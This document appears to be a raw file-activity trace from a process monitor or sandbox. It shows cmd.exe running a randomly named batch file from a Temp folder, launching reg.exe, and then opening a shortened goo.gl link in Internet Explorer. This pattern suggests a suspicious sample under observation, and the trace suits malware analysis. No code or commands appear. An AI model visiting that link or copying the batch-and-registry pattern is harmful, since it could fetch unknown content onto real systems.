11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.340Read1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Read1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\wbem
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0
11/3/2020 - 11:45:43.340Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.340Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.356Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.356Read1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting\SortDefault.nls
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch\sysmain.sdb
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.356Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.356Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.356Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ui\SwDRM.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\Prefetch\REG.EXE-4978446A.pf
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\System32\wow64log.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows
11/3/2020 - 11:45:43.465Unknown2828C:\Windows\SysWOW64\reg.exeC:\Windows
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:43.465Read2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.465Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.465Read2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.528Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\Globalization\Sorting\SortDefault.nls
11/3/2020 - 11:45:43.528Unknown2828C:\Windows\SysWOW64\reg.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:43.528Open2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.mui
11/3/2020 - 11:45:43.528Unknown2828C:\Windows\SysWOW64\reg.exeC:\Windows
11/3/2020 - 11:45:43.528Unknown2828C:\Windows\SysWOW64\reg.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.528Unknown2828C:\Windows\SysWOW64\reg.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.muiKernelBase.dll.mui
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.575Read1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.575Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\http:\goo.gl\
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe.Local
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.575Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\WindowsShell.Manifest
11/3/2020 - 11:45:43.575Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:43.575Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.575Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.622Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\rpcss.dll
11/3/2020 - 11:45:43.622Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\rpcss.dll
11/3/2020 - 11:45:43.622Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\uxtheme.dll
11/3/2020 - 11:45:43.622Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\uxtheme.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch\sysmain.sdb
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.668Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.668Unknown1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.668Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.668Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.668Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.668Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.684Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.684Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.684Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe.Local
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.684Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:43.684Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:43.684Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:43.684Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:43.700Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:43.700Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:43.793Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.793Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch\sysmain.sdb
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.840Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.840Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.840Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Read1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.840Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.856Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\http:\goo.gl\atB7EY
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.856Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.856Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Program Files\Internet Explorer\iexplore.exe
